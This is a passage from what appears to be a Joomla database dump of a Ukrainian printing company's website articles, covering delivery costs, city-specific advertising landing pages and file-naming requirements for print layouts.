1.3em;\"><img src=\"images/stories/newpost.png\" alt=\"\" width=\"271\" height=\"53\" />&nbsp;</strong></p>\r\n				<p>&nbsp;</p>\r\n				<p>&nbsp;</p>\r\n				<p style=\"background-color: #faf9f9; font-size: 14pt; color: #000000; text-align: center;\">Средняя <span style=\"background-color: #ffff00;\">стоимость доставки по Украине составляет 50грн.</span> <br /><span style=\"font-size: 12pt;\">(если посылки весом до 30кг. и длиной до 150см)</span> <br /><br /> <br /> Ориентировочную стоимость доставки крупногабаритной посылки можно узнать в отделении или на сайте Новой Почты.</p>\r\n				<p>&nbsp;</p>\r\n				<p>&nbsp;</p>\r\n				<p>&nbsp;</p>\r\n				<p style=\"text-align: center;\">&nbsp;</p>\r\n				<p style=\"text-align: center;\"><span style=\"font-size: 10pt;\">Наиболее крупные города, в которых востребованы услуги широкоформатной печати:</span></p>\r\n				<p style=\"text-align: center;\">&nbsp;</p>\r\n				<span style=\"font-size: 10pt;\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<strong><span style=\"font-size: 12pt;\"> &nbsp;Киев&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</span></strong>\r\n				</span><strong><span style=\"font-size: 12pt;\">Днепр&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Запорожье&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;Одесса</span></strong>\r\n				<p><span style=\"font-size: 10pt;\"><strong><img title=\"ЭКВАТОРпринт доставка в Киев\" src=\"images/smilies/kiev.jpg\" alt=\"ЭКВАТОРпринт доставка в Киев\" width=\"175\" height=\"175\" />&nbsp; &nbsp;<img src=\"images/smilies/dnepropetrovsk.jpg\" alt=\"\" width=\"175\" height=\"175\" />&nbsp; &nbsp;<img title=\"ЭКВАТОРпринт доставка в Запорожье\" src=\"images/smilies/zaporozie.jpg\" alt=\"ЭКВАТОРпринт доставка в Запорожье\" width=\"175\" height=\"175\" />&nbsp; &nbsp;<img title=\"ЭКВАТОРпринт доставка в Одесса\" src=\"images/smilies/odessa.jpg\" alt=\"ЭКВАТОРпринт доставка в Одесса\" width=\"175\" height=\"175\" /></strong></span></p>\r\n				<p><a title=\"широкоформатная печать\" href=\"https://ekvatorprint.com.ua/\">Широкоформатная печать</a> - перечень услуг</p>\r\n			</td>\r\n		</tr>\r\n	</tbody>\r\n</table>','',0,8,'2012-01-23 10:58:09',62,'','2021-10-06 13:23:23',62,0,'0000-00-00 00:00:00','2012-01-23 10:58:09','0000-00-00 00:00:00','','','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',158,13,'быстрая доставка широкоформатной печати','Доставка по всей Украине - продукции широкоформатной печати - 1-3 дня.',1,63531,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(20,54,'Широформатная печать в Днепре — ЭкваторПринт','2014-01-14-09-22-57','<h1>Заказать широкоформатную печать в&nbsp;Днепре</h1>\r\n<p><span style=\"font-size: medium;\"><strong>Доставка Новой Почтой в течение 2-3 дней</strong>.</span><br /> <span style=\"font-size: medium;\">Стоимость доставки <strong>от 30грн.</strong></span><br />(точную цену можно рассчитать на сайте перевозчка, итоговая цена зависит от габаритов и веса посылки).</p>\r\n<div class=\"margin_center\"><a class=\"bottom_yellow\" href=\"price\">Цены</a><a class=\"bottom_yellow\" href=\"contacts\">Заказать</a></div>\r\n<p><img src=\"images/stories/fy-3208g.jpg\" border=\"0\" title=\"Широформатная печать Днепропетровск\" width=\"344\" height=\"166\" style=\"float: left; border: 0px none; margin-left: 5px; margin-right: 5px;\" />Нужно разрекламировать товар или услугу без лишних денежных затрат? <strong><a href=\"http://ekvatorprint.com.ua/\">Широкоформатная печать рекламных объявлений</a> — правильный выбор</strong>.</p>\r\n<p>Идеальное соотношение стоимости и эффективности</p>\r\n<p>Эффективность уличной и интерьерной рекламы проверена временем. Такая реклама охватывает <strong>максимальное количество потенциальных клиентов</strong> и при этом не требует огромных денежных вложений.</p>\r\n<p>Пожалуй, состязаться в эффективности с этим видом рекламной продукции могут только телевизионные рекламные ролики, но они вызывают у зрителей больше негатива, чем заинтересованности.</p>\r\n<h2>Широкоформатная печать очень востребована в Днепре</h2>\r\n<p>В городе с развитой промышленностью и предпринимательской деятельностью. <strong>Качественный плакат — составляющая прибыльности.</strong></p>\r\n<p>От того, насколько профессионально составлено и отпечатано рекламное объявление будет зависеть прибыльность бизнеса. Ведь при грамотном подходе к созданию наружных и интерьерных рекламных плакатов можно добиться значительного расширения клиентской базы.</p>\r\n<h3>Заказать широкоформатную печать в Днепре по телефонам:</h3>\r\n<p>+38(099) 407-92-92<br />+38(098) 407-92-92<br />+38(093) 407-92-92</p>\r\n<p>&nbsp;</p>\r\n<table border=\"0\" style=\"width: 760px; height: 21px; background-color: #6699cc;\">\r\n<tbody>\r\n<tr>\r\n<td>&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><br /><img title=\"широкоформатная печать Харьков\" src=\"images/stories/kraski.jpg\" alt=\"широкоформатная печать Харьков\" width=\"50\" border=\"0\" style=\"border-width: 0pt; border-style: none; margin: 1px; vertical-align: middle;\" />Типография&nbsp;ЭКВАТОРпринт оказывает следующие услуги:</p>\r\n<p>-&nbsp;<a href=\"banner-printing\">печать рекламных баннеров</a>&nbsp;- недорогая печать высокой эффективности<br />-&nbsp;<a href=\"printing-on-vinyl\">печать на самоклейке</a>&nbsp;- мы используем только качественную и проверенную самоклеющуюся пленку<br />- <a href=\"printing-on-vinyl\">печать фото на холсте</a> и <a href=\"modulnye-kartiny\">модульные картины</a>&nbsp;- печать на холсте с правильной цветопередачей<br /><br /></p>','',0,8,'2014-01-14 09:10:05',62,'','2019-01-16 11:21:51',62,0,'0000-00-00 00:00:00','2014-01-14 09:10:05','0000-00-00 00:00:00','','','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',14,12,'','Широкоформатная печать в Днепропетровске: быстро, большой выбор рулонных материалов, сварка баннерной ткани - быстрая доставка в Днепропетровск.',1,4829,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(21,55,'Широформатная печать в Одессе — ЭкваторПринт','2014-01-14-09-46-53','<h1>Заказать широкоформатную печать в Одессе</h1>\r\n<p><span style=\"font-size: medium;\"><strong>Доставка Новой Почтой в течение 2-3 дней</strong>.</span><br /> <span style=\"font-size: medium;\">Стоимость доставки <strong>от 30грн.</strong></span><br />(точную цену можно рассчитать на сайте перевозчка, итоговая цена зависит от габаритов и веса посылки).</p>\r\n<div class=\"margin_center\"><a class=\"bottom_yellow\" href=\"price\">Цены</a><a class=\"bottom_yellow\" href=\"contacts\">Заказать</a></div>\r\n<p><img src=\"images/stories/print.jpg\" border=\"0\" title=\"Широформатная печать Одесса\" style=\"float: left; margin-left: 5px; margin-right: 5px;\" />Желаете, чтобы о вашей компании узнало как можно больше потенциальных клиентов? Тогда заказывайте <a>широкоформатную печать</a> и размещайте рекламные плакаты в Одессе.</p>\r\n<p>Почему Одесса? Самый крупный портовый город Украины, третий по численности жителей и лучший по качеству жизни — это город-герой. Удачное местоположение, хорошо развитая промышленность и торговля создают благоприятные условия для развития предпринимательства в этом городе.</p>\r\n<h2>Широкоформатная печать очень востребована в Одессе</h2>\r\n<p>Удачная рекламная кампания — одна из важных составляющих успеха любого бизнеса, а широкоформатная печать — базовый элемент современной наружной и интерьерной рекламы. Яркие, красочные плакаты всевозможных размеров стали неотъемлемой частью каждого города, в том числе и Одессы.</p>\r\n<p>Множество людей, местных жителей и гостей Одессы видят рекламные объявления, расположенные на бигбордах и стенах зданий. Информация поступает к потенциальным клиентам и популярность товара или услуги растет с каждым днем. При этом цена за этот вид рекламы относительно невелика и даже мала.</p>\r\n<p>Хотите, чтобы о вас узнало как можно больше людей? Заказывайте широкоформатную печать.</p>\r\n<h3>Заказать широкоформатную печать</h3>\r\n<p>Наша компания <strong>Экваторпринт</strong> работает в сфере полиграфии уже много лет и за это время мы наработали богатый опыт по производству и оформлению рекламных плакатов. При необходимости наши специалисты дадут вам дельный совет как лучше оформить объявления, чтобы широкоформатная печать принесла весомый вклад в развитие вашего бизнеса.</p>\r\n<p>Оформляйте заказ на широкоформатную печать в нашей полиграфии Экваторпринт и тогда ?</p>\r\n<ul>\r\n<li>на вас будет работать наша собственная современная технологическая база</li>\r\n<li>ваш заказ будет выполнен оперативно</li>\r\n<li>широкоформатная печать будет осуществляться на самых лучших <a href=\"printing-on-vinyl\">пленках</a> и <a href=\"banner-printing\">баннерах</a></li>\r\n<li>все ваши пожелания и требования будут учтены</li>\r\n<li>вы будете приятно удивлены скоростью и высоким качеством исполнения заказа</li>\r\n</ul>\r\n<p><strong>Узнавайте подробности оформления заказа, позвонив по телефонам:</strong></p>\r\n<p>+38(099) 407-92-92<br />+38(098) 407-92-92<br />+38(093) 407-92-92</p>','',0,8,'2014-01-14 09:40:22',62,'','2016-04-27 10:55:52',62,0,'0000-00-00 00:00:00','2014-01-14 09:40:22','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',21,11,'','Широкоформатная печать в Одессе: быстро, большой выбор рулонных материалов, сварка баннерной ткани - быстрая доставка в Одессу.',1,5063,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(22,56,'Широкоформатная печать в Киеве — ЭкваторПринт','2014-01-30-10-17-30','<h1>Заказать широкоформатную печать в Киеве</h1>\r\n<p><span style=\"font-size: medium;\"><strong>Доставка Новой Почтой в течение 2-3 дней</strong>.</span><br /> <span style=\"font-size: medium;\">Стоимость доставки <strong>от 30грн.</strong></span><br />(точную цену можно рассчитать на сайте перевозчка, итоговая цена зависит от габаритов и веса посылки).</p>\r\n<div class=\"margin_center\"><a class=\"bottom_yellow\" href=\"price\">Цены</a><a class=\"bottom_yellow\" href=\"contacts\">Заказать</a></div>\r\n<p><img src=\"images/stories/shirokoformatnaya_pechat_kyiv.png\" border=\"0\" alt=\"Широкоформатная печать в Киеве\" width=\"300\" height=\"248\" style=\"float: left; margin-left: 5px; margin-right: 5px;\" />Нужна недорогая реклама продукции или услуг в Киеве? Хотите признаться в любви необычным способом или кого-то близкого поздравить с праздником?</p>\r\n<p><a href=\"http://ekvatorprint.com.ua/\">Широкоформатная печать</a> донесет ваше сообщение жителям Киева.</p>\r\n<h2>Реклама и широкоформатная печать в Киеве</h2>\r\n<p>Широкоформатная печать изображений, как правило, используется с целью создания плакатов для <strong>наружной&nbsp;и внутренней рекламы</strong> продукции или услуг. Этот способ также часто используется для воплощения интерьерных решений, и значительно реже — для личных сообщений, например для признания в любви, поздравления с праздником и т.п.</p>\r\n<p>По эффективности рекламная кампания, проведенная посредством полиграфии, превосходит телевизионные рекламные ролики, во время которых многие идут пить кофе или решают другие проблемы.</p>\r\n<h3>Широкоформатная печать очень востребована в Киеве</h3>\r\n<p>Заказывайте печать больших и маленьких изображений в нашей полиграфии \"ЭкваторПринт\".</p>\r\n<p>Выполнение печатных работ осуществляется на основе ваших макетов или же наши специалисты подготовят все необходимое по вашему заказу. Опытные мастера \"ЭкваторПринт\" дадут рекомендации, позволяющие получить оптимальный результат.</p>\r\n<p>Собственное современное оборудование, богатый опыт, квалифицированные сотрудники — основа создания качественного плаката для наружной или внутренней рекламы в \"ЭкваторПринт\".</p>\r\n<p>Заказывайте исполнение полиграфических работ в нашей компании \"ЭкваторПринт\" и радуйтесь успешности своего бизнеса.</p>\r\n<p><strong>Звоните, чтобы уточнить детали и заказать создание рекламного плаката по телефонным номерам:</strong></p>\r\n<ul>\r\n<li><strong>38 (098) 407-92-92</strong></li>\r\n<li><strong>38 (099) 407-92-92</strong></li>\r\n<li><strong>38 (093) 407-92-92</strong></li>\r\n</ul>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<table border=\"0\" style=\"width: 760px; height: 21px; background-color: #6699cc;\">\r\n<tbody>\r\n<tr>\r\n<td>&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><br /><img title=\"широкоформатная печать Харьков\" src=\"images/stories/kraski.jpg\" alt=\"широкоформатная печать Харьков\" width=\"50\" border=\"0\" style=\"border-width: 0pt; border-style: none; margin: 1px; vertical-align: middle;\" />Компания&nbsp;\"ЭкватрПринт\" качественно выполнит:</p>\r\n<p>-&nbsp;печать бигбордов&nbsp;- печать постеров 6х3м на <a href=\"print-billboards\">бумаге блюбек</a> или <a href=\"banner-printing\">баннерном полотне</a><br />-&nbsp;<a href=\"printing-on-vinyl\">печать на самоклеющемся виниле</a>&nbsp;- эффективная реклама на витринах магазинов и не только<br />-&nbsp;<a href=\"printing-on-the-grid\">печать на сетке</a>&nbsp;- простота при монтаже рекламы больших размеров<br />-&nbsp;<a href=\"print-photo\">фотообои</a>&nbsp;- эксклюзивный дизайн помещения</p>','',0,8,'2014-01-30 10:05:21',62,'','2016-04-27 10:55:42',62,0,'0000-00-00 00:00:00','2014-01-30 10:05:21','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',7,10,'','Широкоформатная печать в Киеве: быстро, большой выбор рулонных материалов, сварка баннерной ткани - быстрая доставка в Киев.',1,4795,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(23,57,'Широформатная печать в Запорожье — ЭкваторПринт','2014-01-30-11-21-52','<h1>Заказать широкоформатную печать в Запорожье</h1>\r\n<p><span style=\"font-size: medium;\"><strong>Доставка Новой Почтой в течение 2-3 дней</strong>.</span><br /> <span style=\"font-size: medium;\">Стоимость доставки <strong>от 30грн.</strong></span><br />(точную цену можно рассчитать на сайте перевозчка, итоговая цена зависит от габаритов и веса посылки).</p>\r\n<div class=\"margin_center\"><a class=\"bottom_yellow\" href=\"price\">Цены</a><a class=\"bottom_yellow\" href=\"contacts\">Заказать</a></div>\r\n<p>Запорожье — большой промышленный город, поэтому очень важно, чтобы реклама товара и услуг была <strong>максимально эффективной</strong>. Достичь желаемого результата при проведении рекламных акций поможет широкоформатная печать.</p>\r\n<h2>Достоинства широкоформатной печати в Запорожье</h2>\r\n<p><img src=\"images/stories/shirokoformatnaya_pechat_zaporoje.jpg\" border=\"0\" alt=\"Широформатная печать в Запорожье\" width=\"300\" height=\"212\" style=\"float: left; border: 0px none; margin-left: 5px; margin-right: 5px;\" /><a href=\"https://ekvatorprint.com.ua/\">Широкоформатная печать</a> позволяет создавать уникальные, красочные изображения, рассказывающие потенциальным клиентам о вашем товаре.<a href=\"printing-on-canvas\">Картины на подрамнике</a>&nbsp;украсят Ваш дом или офис. &nbsp;<a href=\"printing-on-vinyl\">Самоклеющаяся пленка</a> послужит отличным материалом для брендирования транспорта и торговых точек. <a href=\"banner-printing\">Многовечные баннеры</a>, установленные вдоль дорог, охватывают максимальную аудиторию.&nbsp;&nbsp; А это значит, что про вас узнает большинство жителей Запорожья.</p>\r\n<p>Стоимость такой рекламы по сравнению с другими видами (например, с рекламой по телевидению) <strong>относительно низкая</strong>, а эффективность высокая. Заплатив один раз за создание плаката, вам нужно будет доплатить за размещение. И тогда, на протяжении многих дней, уже без оплаты, ваше сообщение круглосуточно будет рассказывать о вашем товаре, привлекая все новых клиентов.</p>\r\n<h3>Широкоформатная печать очень востребована в Запорожье</h3>\r\n<p><strong>Полиграфия \"ЭкваторПринт\"</strong> принимает заказы на широкоформатную печать от жителей красивого города Запорожье.</p>\r\n<p>Стоимость осуществления работ зависит от размера и метода нанесения изображения, а также других факторов. Цена рассчитывается для каждого заказа индивидуально.</p>\r\n<p>Мы строго следим за соблюдением сроков выполнения заказа, собственное оборудование позволяет все работы выполнять качественно и в срок.</p>\r\n<p><strong>Звоните менеджерам по телефонным номерам</strong>, узнавайте интересующие вас детали и заказывайте широкоформатную печать, которая расскажет всем жителям Запорожья о вашей продукции или услуге:</p>\r\n<ul>\r\n<li><strong>38 (098) 407-92-92</strong></li>\r\n<li><strong>38 (099) 407-92-92</strong></li>\r\n<li><strong>38 (093) 407-92-92</strong></li>\r\n</ul>','',0,8,'2014-01-30 11:06:03',62,'','2019-04-23 10:38:04',62,0,'0000-00-00 00:00:00','2014-01-30 11:06:03','0000-00-00 00:00:00','','','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',7,9,'','Широкоформатная печать в Запорожье: быстро, большой выбор рулонных материалов, сварка баннерной ткани - быстрая доставка в Запорожье.',1,4395,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(25,59,'Широкоформатная печать в Харькове — ЭкваторПринт','2014-01-30-11-50-48','<h1><span style=\"font-size: 18pt; color: #0000ff;\">Заказать широкоформатную печать в Харькове.</span></h1>\r\n<p><span style=\"font-size: 14pt; font-family: verdana, geneva; color: #000000;\"><strong>Варианты доставки по Харькову:</strong><br />✔ Самовывоз<br />✔ <a href=\"delivery\">Курьерская служба Новая Почта</a></span></p>\r\n<p><span style=\"font-size: 14pt; font-family: verdana, geneva; color: #000000;\">Перед доставкой наши менеджеры свяжутся с Вами для согласования адреса доставки.</span></p>\r\n<div class=\"margin_center\"><span style=\"font-family: verdana, geneva;\"><a class=\"bottom_yellow\" title=\"Цена широкоформтаной печати Харьков\" href=\"price\">Цены</a><a class=\"bottom_yellow\" title=\"Заказть широкоформатную печать \" href=\"contacts\">Заказать</a></span></div>\r\n<p><img style=\"float: left; margin-left: 5px; margin-right: 5px;\" src=\"images/stories/shirokoformatnaya_pechat_kharkov.jpg\" alt=\"Широкоформатная печать в Харькове\" width=\"300\" height=\"158\" border=\"0\" />Сегодня ни один город не обходится без уличных и интерьерных рекламных объявлений и Харьков — не исключение.</p>\r\n<p>В таком крупном городе, втором по численности населения среди городов Украины, <a href=\"http://ekvatorprint.com.ua/\">широкоформатная печать</a> стала одним из <strong>самых эффективных</strong> рекламных средств. Еще бы, яркие рекламные плакаты, расположенные вдоль дорог просто <strong>«попадаются на глаза»</strong>: их видят тысячи людей в день. Бесспорно, такие сообщения достигнут сердец своей целевой аудитории, пребывающей в Харькове.</p>\r\n<p>И не только высокая эффективность числится в достоинствах этого метода.</p>\r\n<p>Широкоформатная печать не требует баснословных капиталовложений — это эффективный, но недорогой способ разрекламировать товар или услугу.</p>\r\n<h2>Широкоформатная печать очень востребована в Харькове</h2>\r\n<p>Наша полиграфия \"ЭкваторПринт\" выполняет заказы на создание различной печатной продукции: <a href=\"banner-printing\">баннера</a>, <a href=\"printing-on-vinyl\">самоклеющиеся пленки</a>, <a href=\"printing-on-canvas\">картины на холсте</a>.</p>\r\n<p>Ваш заказ будет исполнен в <strong>минимальные сроки</strong> и качество исполнения при этом будет <strong>отменным</strong>.</p>\r\n<p>Мы можем так говорить, потому что все заказы выполняются на собственном современном оборудовании по передовым технологиям. Мы заинтересованы в высоком качестве продукции и строго следим за процессом исполнения ваших плакатов.</p>\r\n<p>Доверьте свой успех опытным мастерам, заказывайте широкоформатную печать <strong>в полиграфии \"ЭкваторПринт\"</strong> и получайте его в считанные дни.</p>\r\n<p>На ваши вопросы обязательно ответят опытные специалисты, звоните им по телефонным номерам:</p>\r\n<ul>\r\n<li><strong>38 (098) 407-92-92</strong></li>\r\n<li><strong>38 (099) 407-92-92</strong></li>\r\n<li><strong>38 (093) 407-92-92</strong></li>\r\n</ul>','',0,8,'2014-01-30 11:41:06',62,'','2016-04-27 09:54:13',62,0,'0000-00-00 00:00:00','2014-01-30 11:41:06','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',16,8,'широкоформатная печать Харьков','Широкоформатная печать в Харькове в ЭкваторПринт - центр Харькова, Метро Спортивная. Выгодная цена. Печать заказа за 1-2 дня. ',1,6700,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(26,60,'Требования к макету','2015-10-13-12-03-19','<table style=\"width: 745px; height: 122px;\">\r\n	<tbody>\r\n		<tr>\r\n			<td>\r\n				<p style=\"text-align: justify;\"><span style=\"font-size: 160%;\"><span style=\"background-color: #ffe4b5;\">Для того чтоб Ваш заказ был наиболее оперативно принят в работу</span>, просим соблюдать требования к макетам.</span>\r\n				</p>\r\n				<p style=\"text-align: justify;\"><span style=\"font-size: 140%;\">Соблюдение требований к макетам значительно ускорит срок приема и изготовления Вашего заказа.</span></p>\r\n			</td>\r\n		</tr>\r\n	</tbody>\r\n</table>\r\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"5\" style=\"width: 745px;\">\r\n	<tbody>\r\n		<tr>\r\n			<td colspan=\"4\" style=\"background-color: #172983; text-align: center;\"><span style=\"font-size: 160%;\"><span style=\"color: #ffec00;\"><strong>ТРЕБОВАНИЯ К МАКЕТАМ</strong></span></span>\r\n			</td>\r\n		</tr>\r\n		<tr>\r\n			<td style=\"text-align: center;\"><span style=\"font-size: 120%;\"><strong>1</strong></span></td>\r\n			<td colspan=\"3\">\r\n				<p><span style=\"font-size: 160%;\">Файлы принимаются в формате <strong>JPEG</strong>;<em><br /></em></span></p>\r\n			</td>\r\n		</tr>\r\n		<tr>\r\n			<td style=\"text-align: center;\"><span style=\"font-size: 120%;\"><strong>2</strong></span></td>\r\n			<td colspan=\"3\"><span style=\"font-size: 160%;\">Макет должен быть в реальном размере (1:1)<br /></span></td>\r\n		</tr>\r\n		<tr>\r\n			<td style=\"text-align: center;\"><span style=\"font-size: 120%;\"><strong>3</strong></span></td>\r\n			<td colspan=\"3\"><span style=\"font-size: 160%;\">Разрешение в макете для интерьерной печати должно быть <strong>до</strong> 150 пикс./дюйм, для наружной рекламы - <strong>до</strong> 70 пикс./дюйм.</span></td>\r\n		</tr>\r\n		<tr>\r\n			<td style=\"text-align: center;\"><span style=\"font-size: 120%;\"><strong>4</strong></span></td>\r\n			<td colspan=\"3\">\r\n				<p><span style=\"font-size: 180%;\"><span style=\"color: red;\">Названия файлов должны подписываться строго в следующем порядке</span>: кол-во штук, материал, размер, дополнительные услуги.</span>\r\n				</p>\r\n				<p><span style=\"font-size: 140%;\">К примеру: <em>2шт_пленкаFotoJet_80x80см_обрезка по периметру*</em>, </span><br /><span style=\"color: #0021ff; font-size: 120%;\">/Если необходимо напечатать две самоклеющиеся пленки размером 80смх80см и вырезать их в размер по контуру/</span> <br /><span style=\"font-size: 110%; color: #35a8f8;\"><strong>*По периметру обрезаем только файлы со стороной не менее 80см.</strong></span></p>\r\n				<p><span style=\"font-size: 140%;\">или:<em>3шт_баннер ламинированный_100х150см</em></span><br /><span style=\"color: #0021ff; font-size: 120%;\">/Если необходимо напечатать ламинированый баннер в колличестве 3х шт без установки люверсов и других дополнительных услуг/</span></p>\r\n				<p><span style=\"font-size: 140%;\">или:&nbsp;<em>2шт_баннер ламинированный_100х150см_люверсы 30см по периметру.</em>&nbsp;</span><br /><span style=\"color: #0021ff; font-size: 120%;\">/Если нужно напечатать два ламинированных баннера размером 100х150см, обрезать в размер по периметру и установить люверсы по периметру с шагом каждые 30см/</span></p>\r\n				<p><span style=\"font-size: 140%;\">или:&nbsp;<em>2шт_баннер ламинированный_100х150см_подворот_ люверсы 30см по периметру.</em>&nbsp;</span><br /><span style=\"color: #0021ff; font-size: 120%;\">/Если необходимо напечатать два ламинированых баннера размером 100х150см, дополнительно добавить и проклеить подворот по периметру, а также установить в баннер люверсы по периметру с шагом 30см /</span></p>\r\n				<p><span style=\"font-size: 140%;\">или:&nbsp;<em>1шт_баннер ламинированный_100х150см_проклейка под трубу верх и низ.</em>&nbsp;</span><br /><span style=\"color: #0021ff; font-size: 120%;\">/Если будет печататься баннер 100х150см, и если сверху и снизу нужно добавить поля и проклеить карманы под трубу/</span></p>\r\n				<p><span style=\"font-size: 140%;\">или:&nbsp;<em>1шт_холст_30х40см.</em>&nbsp;</span><br /><span style=\"color: #0021ff; font-size: 120%;\">/Если необходимо напечатать картину на холсте размером 30х40см и натянуть на деревянный подрамник/</span></p>\r\n				<p><span style=\"font-size: 140%;\">или:&nbsp;<em>2шт_холст 30х40см_без натяжки на подрамник.</em>&nbsp;</span><br /><span style=\"color: #0021ff; font-size: 120%;\">/Если нужно напечатать две картины на холсте 30х40см и не натягивать на подрамник/</span></p>\r\n				<p><span><em style=\"font-size: medium; line-height: 1.3em;\"><img src=\"images/bannermaket3.jpg\" alt=\"\" width=\"631\" height=\"43\" /></em></span></p>\r\n				<p><span><img title=\"Как подписывать макет пленки\" src=\"images/smilies/plenkamaket.jpg\" alt=\"Как подписывать макет пленки\" /></span></p>\r\n				<p><span><img title=\"Как подписывать макет картины\" src=\"images/holstmaket3.jpg\" alt=\"Как подписывать макет картины\" /></span></p>\r\n			</td>\r\n		</tr>\r\n		<tr>\r\n			<td style=\"text-align: center;\"><strong style=\"font-size: 120%;\">5</strong></td>\r\n			<td colspan=\"3\"><span style=\"font-size: 130%;\">Для максимально правильной цветопередачи рекомендуем подготавливать макеты в цветовом режиме CMYK. Файлы в цветовых режимах RGB и LAB также принимаем.</span></td>\r\n		</tr>\r\n		<tr>\r\n			<td style=\"text-align: center;\"><strong style=\"font-size: 120%;\">6</strong></td>\r\n			<td colspan=\"3\"><span style=\"font-size: 160%;\">Большое количество файлов просим высылать одним письмом в одном архиве.</span></td>\r\n		